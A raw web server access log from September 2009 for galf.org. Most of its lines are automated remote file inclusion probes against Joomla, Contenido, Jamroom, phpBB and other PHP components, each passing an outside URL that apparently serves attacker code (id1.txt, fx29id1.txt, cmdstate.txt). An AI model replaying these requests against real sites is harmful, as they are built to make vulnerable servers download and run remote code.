99.198.106.178 - - [07/Sep/2009:03:44:22 -0700] "GET /logs/access.log%20%20//components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.63.4.74 - - [07/Sep/2009:03:45:03 -0700] "GET /logs/access_090309.log%20%20////vwar/backup/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.63.4.74 - - [07/Sep/2009:03:45:03 -0700] "GET /logs////vwar/backup/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.63.4.74 - - [07/Sep/2009:03:45:07 -0700] "GET ///vwar/backup/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.202.66 - - [07/Sep/2009:03:45:51 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "galf.org"
211.43.202.66 - - [07/Sep/2009:03:45:51 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "galf.org"
72.29.82.154 - - [07/Sep/2009:03:46:13 -0700] "GET /errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:03:46:13 -0700] "GET /logs/errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:03:46:13 -0700] "GET /logs/access_090216.log/errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:46:18 -0700] "GET ///vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [07/Sep/2009:03:46:19 -0700] "GET /logs////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [07/Sep/2009:03:46:19 -0700] "GET /logs/access.log////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [07/Sep/2009:03:46:56 -0700] "GET /logs////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [07/Sep/2009:03:46:56 -0700] "GET /logs/access.log////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [07/Sep/2009:03:46:59 -0700] "GET ///vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.29.82.154 - - [07/Sep/2009:03:47:14 -0700] "GET /logs/access_090601.log/errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:03:48:48 -0700] "GET /logs/access_090216.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:03:48:48 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:03:48:48 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:03:48:59 -0700] "GET /logs/access_090216.log%20%20/errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:03:49:36 -0700] "GET /logs/access_090601.log%20%20/errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:03:49:43 -0700] "GET /logs/access_090601.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:03:50:30 -0700] "GET /logs/access_090216.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:03:51:06 -0700] "GET /logs/access_090601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:03:53:42 -0700] "GET /logs/access_090629.log%20%20/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:03:53:42 -0700] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:03:53:42 -0700] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:03:53:45 -0700] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:03:53:45 -0700] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:03:53:46 -0700] "GET /logs/access_090629.log%20%20/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.202.66 - - [07/Sep/2009:03:54:22 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
211.43.202.66 - - [07/Sep/2009:03:54:22 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
222.122.72.216 - - [07/Sep/2009:03:55:07 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:03:55:07 -0700] "GET /logs/access_090323.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:03:55:07 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
99.198.106.178 - - [07/Sep/2009:03:56:42 -0700] "GET /logs/access.log//components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.72.216 - - [07/Sep/2009:03:56:45 -0700] "GET /logs/access_090803.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:03:57:06 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.29.82.154 - - [07/Sep/2009:03:57:06 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.29.82.154 - - [07/Sep/2009:03:57:06 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
82.146.119.209 - - [07/Sep/2009:04:00:00 -0700] "GET /logs/access_090316.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:04:00:00 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:04:00:00 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:04:03:13 -0700] "GET /logs/access_090323.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.202.66 - - [07/Sep/2009:04:03:40 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "galf.org"
211.43.202.66 - - [07/Sep/2009:04:03:41 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "galf.org"
82.151.132.176 - - [07/Sep/2009:04:04:01 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:04:04:01 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:04:04:01 -0700] "GET /logs/access_090706.log%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.22.91 - - [07/Sep/2009:04:04:09 -0700] "GET /logs/access_090316.log HTTP/1.0" 200 9046059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:04:04:26 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:04:04:26 -0700] "GET /logs/access_090316.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:04:04:26 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:04:05:53 -0700] "GET /errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.29.82.154 - - [07/Sep/2009:04:05:53 -0700] "GET /logs/access.log/errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.29.82.154 - - [07/Sep/2009:04:05:53 -0700] "GET /logs/errors.php?error=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [07/Sep/2009:04:05:58 -0700] "GET /logs/access_090629.log%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:04:06:53 -0700] "GET /logs/access_090511.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:04:07:29 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.29.82.154 - - [07/Sep/2009:04:07:29 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.29.82.154 - - [07/Sep/2009:04:07:29 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.90.115.6 - - [07/Sep/2009:04:11:50 -0700] "GET /logs/access_090720.log///?_SERVER[DOCUMENT_ROOT]=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.90.115.6 - - [07/Sep/2009:04:11:50 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://gn.fileave.com/id1.txt? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
66.90.115.6 - - [07/Sep/2009:04:11:50 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://gn.fileave.com/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.90.115.6 - - [07/Sep/2009:04:13:48 -0700] "GET /logs/access_090720.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.80.229.6 - - [07/Sep/2009:04:13:50 -0700] "GET /logs/access_090615.log/errors.php?error=http://maderasglob.no.comunidades.net/cmdstate.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
66.90.115.6 - - [07/Sep/2009:04:14:30 -0700] "GET /logs/access_090323.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.80.229.6 - - [07/Sep/2009:04:18:16 -0700] "GET /logs/access_090601.log/errors.php?error=http://maderasglob.no.comunidades.net/cmdstate.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:04:20:38 -0700] "GET /faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.80.229.6 - - [07/Sep/2009:04:20:45 -0700] "GET /logs/access_090615.log/mygallerybrowser.php?myPath=http://maderasglob.no.comunidades.net/cmdstate.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:04:22:51 -0700] "GET /logs/access.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:04:22:51 -0700] "GET /oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:04:22:51 -0700] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.80.229.6 - - [07/Sep/2009:04:26:50 -0700] "GET /logs/access_090601.log/mygallerybrowser.php?myPath=http://maderasglob.no.comunidades.net/cmdstate.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
128.112.139.236 - - [07/Sep/2009:04:27:44 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "nu_tch-princeton/Nu_tch-1.0-dev (princeton crawler for cass project; http://www.cs.princeton.edu/cass/; zhewang a_t cs ddot princeton dot edu)" "www.galf.org"
128.112.139.236 - - [07/Sep/2009:04:27:44 -0700] "GET /cendoc.php HTTP/1.0" 404 275 "-" "nu_tch-princeton/Nu_tch-1.0-dev (princeton crawler for cass project; http://www.cs.princeton.edu/cass/; zhewang a_t cs ddot princeton dot edu)" "www.galf.org"
218.27.203.107 - - [07/Sep/2009:04:29:22 -0700] "GET //config.php?path_to_root=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.184.252.3 - - [07/Sep/2009:04:31:52 -0700] "GET //config.php?path_to_root=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.146.177.61 - - [07/Sep/2009:04:32:57 -0700] "GET /logs/access.log HTTP/1.1" 200 266423 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
202.146.177.61 - - [07/Sep/2009:04:34:24 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
121.101.214.52 - - [07/Sep/2009:04:40:23 -0700] "GET //config.php?path_to_root=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:04:40:36 -0700] "GET /include/write.php?dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:04:40:37 -0700] "GET /logs/access_090309.log%20%20//include/write.php?dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:04:40:37 -0700] "GET /logs//include/write.php?dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:04:40:53 -0700] "GET /include/write.php?dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:04:40:53 -0700] "GET /logs/access_090309.log%20%20//include/write.php?dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:04:40:53 -0700] "GET /logs//include/write.php?dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:04:42:02 -0700] "GET /logs/access_090525.log%20%20//include/write.php?dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:04:42:20 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
117.110.59.2 - - [07/Sep/2009:04:42:20 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
117.110.59.2 - - [07/Sep/2009:04:42:20 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
117.110.59.2 - - [07/Sep/2009:04:42:21 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
117.110.59.2 - - [07/Sep/2009:04:42:21 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
117.110.59.2 - - [07/Sep/2009:04:42:21 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.27.203.107 - - [07/Sep/2009:04:44:05 -0700] "GET /logs/access.log///config.php?path_to_root=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.27.203.107 - - [07/Sep/2009:04:44:06 -0700] "GET //config.php?path_to_root=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.27.203.107 - - [07/Sep/2009:04:44:06 -0700] "GET /logs///config.php?path_to_root=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.146.177.61 - - [07/Sep/2009:04:46:30 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
65.55.209.189 - - [07/Sep/2009:04:46:41 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.189 - - [07/Sep/2009:04:46:42 -0700] "GET /logs/access_090511.log HTTP/1.1" 200 1376256 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:04:47:42 -0700] "GET /logs/access_090525.log%20%20//include/write.php?dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.146.177.61 - - [07/Sep/2009:04:48:27 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
202.146.177.61 - - [07/Sep/2009:04:50:46 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
207.58.163.86 - - [07/Sep/2009:04:52:19 -0700] "GET /modules/My_eGallery/index.php?basepath=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
207.58.163.86 - - [07/Sep/2009:04:52:19 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
207.58.163.86 - - [07/Sep/2009:04:52:19 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://alandar.net/www2/log1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
121.101.214.52 - - [07/Sep/2009:04:55:18 -0700] "GET /logs/access.log///config.php?path_to_root=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
121.101.214.52 - - [07/Sep/2009:04:55:22 -0700] "GET //config.php?path_to_root=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
121.101.214.52 - - [07/Sep/2009:04:55:29 -0700] "GET /logs///config.php?path_to_root=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.163.86 - - [07/Sep/2009:04:56:32 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
207.58.163.86 - - [07/Sep/2009:04:56:32 -0700] "GET /modules/My_eGallery/index.php?basepath=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
207.58.163.86 - - [07/Sep/2009:04:56:32 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
207.58.163.86 - - [07/Sep/2009:04:56:35 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
207.58.163.86 - - [07/Sep/2009:04:56:35 -0700] "GET /modules/My_eGallery/index.php?basepath=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.0" 404 275 "-" "libwww-perl/5.831" "galf.org"
207.58.163.86 - - [07/Sep/2009:04:56:35 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
202.146.177.61 - - [07/Sep/2009:05:00:13 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
79.174.78.83 - - [07/Sep/2009:05:01:27 -0700] "GET /logs//citywriter/head.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:01:27 -0700] "GET /logs/access.log%20%20//citywriter/head.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:01:27 -0700] "GET /citywriter/head.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
